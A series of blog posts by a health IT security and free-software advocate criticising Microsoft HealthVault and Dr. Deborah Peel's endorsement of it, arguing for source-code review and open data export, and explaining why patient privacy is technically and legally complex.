Meeting Dr. Peel

Medsphere, and the Shreeve Tragedy have left me a little jaded. I have little patience for those who threaten the health FOSS community. Believe it or not, I rarely allow my aggression to turn public. I can think of at least 5 friendships with current FOSS community members, that began with rather nasty emails originating from me. Most of these useful harassments never make it into the public eye. The work that Dr. Peel has done with Microsoft around their HealthVault line has been a notable exception. Dr. Peels public endorsement of Microsoft originally shocked me so greatly that I felt I had to publicly respond.

So it was with great anticipation that I was able to hear Dr. Peel speak for the very first time today at HIMSS 08. In her talk, she indirectly addressed many of my criticisms. Lets review some of the “potshots” that I have taken at her, and detail what I heard in her talk about this issues.

Dr. Peel detailed her plans to create a new organization to perform privacy reviews of PHR sourcecode and privacy policies.

Apparently the new certifying organization will not certify PHR systems, without performing a sourcecode review.

Obviously, through the new certifying organization, the “endorsement” of Microsoft would become a formal matter. The endorsement would be withdrawn, if Microsoft started behaving badly.

I wish that I could believe that Dr. Peel started these initiatives in response to my criticisms (it would make me feel very important indeed to know that she was listening), however it is entirely possible that she may have had this plan in her organizations Skunk Works long before I was saying anything.

Here are some further snippets that I found comforting from her presentation.

  • She has claimed that she has not taken any money from Microsoft, she gets her funds from her own network of friends and supporters. (Transparency is good)
  • When I asked about the clause in Microsoft’s privacy policy that specifically gave permission for Microsoft to off-shore data storage, she immediately replied that she thought that was totally unacceptable.
  • While she listed Microsofts Healthvault as a “good” project, she also listed Microsoft on the pages of privacy violators, so she both endorsed and condemned them in the same talk.
  • She talked to me after her talk and was quite friendly

The only thing I could criticize about her talk specifically was her slide about the VA data thefts. She had put a WorldVistA logo on the top of the page, but the data breaches were a problem within the VA, and had nothing to do with WorldVistA. WorldVistA is a private organization that shares an interest in VistA with the VA, but otherwise is not connected with the VA at all, and certainly had nothing to do with the data breaches. In fact WorldVistA has and will continue to improve the overall privacy and security of private installations of VistA. Still, I am probably the only person in the crowd who even noticed this, and I doubt anyone thinks negatively about WorldVistA as the result of her talk.

In short, Dr. Peel is probably going to address the bulk of my complaints. She may have been planning to for months before I said anything.

So this is not a retraction of my attacks against her, but rather a reprieve. (When someone turns around like this a reprieve from criticism is popular within our community). If she continues on this path, I will fully retract my criticisms towards her personally.

Also note, that despite the fact that HealthVault has surprised me recently, it has NOT earned a reprieve yet. That may happen in a following post. There seem to be some changes in the privacy policy, and there has been some movement towards open-ness. HealthVault has invited me to engage them in person and I plan to do that before the conference is over. I am hopeful.

-FT

HealthVault: becoming un-Microsoft?

What I have read this morning almost made me choke on my cheerios.

Neil Versel (one of the most in-the-loop Health IT journalist I know) turned me on to a blog post from Sean Nolan, that I obviously did not want to miss. The post, aptly titled Opening up the Vault revealed several important claims:

  • Microsoft is releasing a Java wrapper library under the OSI approved Microsoft Public License
  • Microsoft is releasing some .NET code under a read-only license (i.e. not open source)
  • Most importantly Microsoft is releasing the entire HealtVault XML interface specification under the Microsoft Open Specification Promise

I need to research the Microsoft Open Specification Promise, to say the least it appears that there is some confusion as to its legitimacy for FOSS developers. I have “call” into the Software Freedom Law Center, to see what their current evaluation of the promise is. Still the significance of this cannot be underestimated. Sean claims:

“With this information, developers will be able to reimplement the HealthVault service and run their own versions of the system.”

Don’t get me wrong, I trust Microsoft about as far as I can throw them (all of them… at once), but this is definitely a step in the right direction. It will take me some time to sort out just how meaningful a step.

This is a smart time to do this too. There is like a 90% probability that Google will be officially announcing its PHR effort at HIMSS. (Heck its been leaked already) By releasing an API, Microsoft is essentially challenging Google to do the same, and that could mean that hacktivists like myself could build arbitrary bridges between the two (now this is hopeful…) which would mean that Google and Microsoft’s systems would compete on merit rather than most-effective-lock-in.

-FT

HealthVault Response: Lucid comments from Fred Fortin

The World Healthcare Blog recently had a post that quoted a portion of a post from my HealthVault series. In the post, titled, What Will Patients Expect in the Completeness of Their Electronic Medical Records? Fred Fortin extends upon my comments about the complexity of patient privacy with some lucid questions about the implications of trusting a meta-EHR system like HealthVault. Since he quoted me :)

Either by design, incompatibility, law, or systems failure, something will be missing (from the HealthVault record). Will it be important information? Who knows. But the public, as it has with banks, credit cards and other electronic dependencies, may believe it to be complete. They may, in fact, have a view of EMRs that is more in line with the industry’s marketing image than with the intricacies or record-keeping reality.

Worth a read! It is satisfying to know that I am making people think and comment.

HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel’s bio, she has done an impressive amount of medicine and privacy activism. At least on this bio, she lists no formal computer science training. On the same page we find the bio’s of the other members of the Patient Privacy Rights board members. Please note especially the bio of Tina Williamson (use this link as the one on the bio page is broken) who was formerly the Vice President of Marketing for a dot com company. This work should count as negative experience for determining the validity of marketing claims as per sourcecode. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope no computer science trained staff there.

According to the Patient Privacy Rights website, there is no competent electronic security or privacy expert with actual computer science training associated with Patient Privacy Rights organization. But remember the Privacy Coalition is much more than just the Patient Privacy Group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Deborah Peels recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumers healthcare record.

Of the 45 organizations, (which are probably great organizations…) only three are technology oriented. One of them is a meta blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, and I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR)

From what I can tell the most technically impressive person at EPIC is Simon Davies, the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peels recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement, instead it sounds like typical statements from someone who recognizes the depth of complexity involved. I doubt that Dr. Peels technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently lead by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them but so far it does not seem like they were consulted, Fyodors first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy or without consulting someone who had a tremendous amount of technical savvy? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be utmost of hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommended specific drugs to a mental health patient, despite that fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I was forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around alot, something with a big name that made me and my patients feel more comfortable. 8 times out of 10 my prescription might work fine, but I have no idea why it would not work the other 2 times, no idea how to determine if it was working or not and no idea what to do to fix it. I have a four year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding of drug impact to something like 98% accuracy takes about a decade (not to mention the time required by board certification) . Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine if they match high level privacy guidelines. Based on my personal experience it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume move outside of my area of expertise to make any clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait, having expertise in medicine does not exclude expertise in Computer Science generally or elctronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board certified psychiatrist also has a masters in Computer Science? What happens when the same person spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns that I am raising. Many of Microsoft’s experts have experience that are equivalent to Dr. Valdes’ training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy endorsing a company with arguably the worst security and privacy track ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be very much past her technical depth.

Of course I could be wrong. I have not seen Dr. Peels vita. If Dr. Peel will publish her full resume and it contains solid computer science based privacy training and experience that she has left off of her online biography, I will be happy to retract some of these criticisms. The only thing that can justify Dr. Peels endorsements are a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful it would be good for Microsoft’s bottom line, but terrible for our cultures. Indeed Dr. Peel is right about one thing, Microsoft would be “leading” us. Those wearing shackles are often lead by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refused to budge.

We need to write a tool, using the Microsoft HealthVault API to export the data from HealthVault. Preferably this should export to a standard format, but comma delimited is better than nothing.

If you are investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me.. I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code, (which you should not) you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing sourcecode, Microsoft would ensure that the software could be run without Microsofts help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing your consumers to download their data in a standard format you would ensure that the data would not be trapped in a proprietary format.

Recently Microsoft has released two licenses that were approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowballs chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion , you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally all of the “Patient Privacy Principles” have this problem. They are great principles but when you get deeper, to the level that is required when implementing software, it is obvious that they are only useful in spirit. For instance.

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good right? But does that mean that you will require consent to inform the employer of a workers compensation injury status? Doesn’t the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly does informed consent mean? When was the last time you started a new job and did not sign all of the fifteen CYA forms that you employer put in front of you? Does that count as informed consent? Again, obviously the spirit of the law here is good, which is something like “the employers should not be able to discriminate against employees based on health information” but that does not cut it when making software, we have to actually determine exactly what system will do and what it will not do, in order to write software.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peels endorsement of Microsoft’s HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry, you see the roasted turkey browned to perfection with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs, they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” using a paint remover gun. The pat of butter… well, lets just say its not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent Computer Scientist would acknowledge that this is trivially true: obviously it is not what Microsoft says that matters, nor is it what the software appears to do! What matters is what the software actually does and the only way to determine this, one way or another is to read the sourcecode. There is a long and glorious tradition in the software industry of shall we say “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this source code vs. marketing material gap? More on this issue later.

-FT

HealthVault Comments: Deepak Singh replies

I try to keep up with other coverage of HealthVault, and doing so lead me to watch a video produced by mndoci on Youtube. I contacted the author, Deepak Singh and asked him if he would do a YouTube video in response to my HealthVault articles. I have been thinking about trying a video post, but have been afraid to take the plunge, now I can see how videos work in this blog by posting Deepak’s video directly here.

The video is a great help to me. I often feel that my writing is clear, and concise. I usually feel this way until I actually talk to a reader, whose questions and criticisms make it clear that I was clearly not so clear. Clarity, apparently, requires hindsight, and sometimes humiliation. I will be posting more about the blogospheres reaction to my HealthVault articles soon. I will be making some changes to make my articles better afterward, so if you are interested in reading version .1 of my thinking on this, better get it now.

-FT

Privacy, a Complex Problem Underestimated.

I have passed my CISSP certification, marking me as an Information Security Expert. I had to pass a complex test and demonstrate that I had three years of full-time security experience to become CISSP certified. I have a four year degree in Computer Science, and I have been trained in Information Warfare by the United States Air Force at the Air Force Information Warfare Center in San Antonio. I have been trained in physical security by the United States Marine Corps (Hoorah). I have worked in Healthcare IT Security for over 5 years now. Frankly, I find the issue of Health Information Security to be extremely complex. Here are examples of the thorny issues that I face as a professional. (this article was originally written about HealthVault, but applies so broadly I removed HealthVault from the title 10-04-11)

There are various State and National laws that govern the disclosure of HIV or AIDs status. These often mean that portions of medical records must be operate with different disclosure rules based on whether they reveal a persons HIV status. For instance imagine the physician discussing a patient with AIDS in the notes section for that patient.

” It would be good if Patient X could maintain their exercise regime. However, given his level of immune function, Patient X should stay away from public gymnasiums, which can be unsanitary. I recommend any kind of constant aerobic activity, three times a week for at least 30 minutes each.”

Normally a message like this would be ideal for a PHR to pass to a personal trainer, however the middle sentence arguably reveals the HIV status of the patient. There was no mention of the terms “HIV” or “AIDS” so a simple text search of the document could not easily determine that it was associated with HIV status. Yet this piece of patient information should be treated differently. The level of awareness that a PHR would need to have in order to determine that the note above is related to HIV status is equivalent to human intelligence. The PHR would need to understand English to such a high degree that it would be very close to passing the Turing Test.

The alternative, of course, is to have a person validate every piece of data to see if they reveal HIV status for patients whose PHR records are tagged with HIV positive status. But how many records could such a custodian hope to manage? What level of human-error would be acceptable from such a custodian? Assuming all the records were correctly tagged, how could a human accurately review thousands of medical data points in a given record?

But even those issues ignore the problem of who tags a record with HIV status. Perhaps the patient should be in charge of tagging the account with HIV status, so that automated systems could attempt to handle the rest. But what if a patient wants to withhold that status from the PHR?

What about Family planning and pregnancy status? Physicians must be very careful to follow local laws to know what extent a patients parents can be informed about their under-aged daughters reproductive condition. However, any other medical condition would obviously be under the purview of the child’s parents or guardians.
There are also cases where the patients themselves cannot access their own records. Many psychiatrist records must be protected in this manner.
Can a patient remove the information that they have diabetes from their own record? Can they remove their allergy to penicillin? What if they removed it on accident? If patients can accidentally remove data, or can remove a diagnosis or allergy that they do not like, how can a physician or other healthcare provider rely on the contents of the PHR? If a physician knows that they cannot rely on the contents of the PHR, why would they both to add information themselves. If physicians do not add information to the PHR, why should its contents be trusted. Electronic trust is tricky.

If the patient cannot totally control every aspect of the record, does the patient really own the record? Does the healthcare provider own the record, even though the law often compels providers to produce and distribute a patients record?

How much information should payers (insurance companies, etc.) be able to see? Payers certainly must be made aware of the procedures that they will be paying for, but they should not be given so much information that they can discriminate inappropriately.

Lets sum up. Medical records belong to the patient, except when they don’t. They should be accessible to the patient except when they shouldn’t. The records of minors are always open to their guardians except when they are closed. Segmenting data in order to protect portions of health information is currently an intractable problem of free-text analysis. Tagging patient records with critical information is difficult. Trust is far more complex than is first seems. Finally, patients should be allowed to “control” their own record, except when that control would allow them to do something that would invalidate the record.

This is just a taste of the kinds of problems that I have run across during a career as a health information privacy professional. Notice that a deep understanding of several of these problems requires enough Computer Science know-how to understand why free text analysis is a difficult problem. The other problems required at least shallow understandings of medico-legal issues, which seems simple until you consider how you are going to design a PHR or EHR to meet these requirements.

How do you design a PHR so that “control” can be so finely parsed? How do you put the doctor in charge sometimes, the patient in charge other times (except to undo what the doctor did), the teenage daughter in charge, for only one of her medical issues, in such a way that her parents are not informed about that one medical issue, but are in charge of everything else?

In short “patient privacy” is a very, very complex problem that requires some pretty high level thinking and is pretty easy to mess up. When you see someone pretending like there is a simple solution to these problems, you should be very suspect.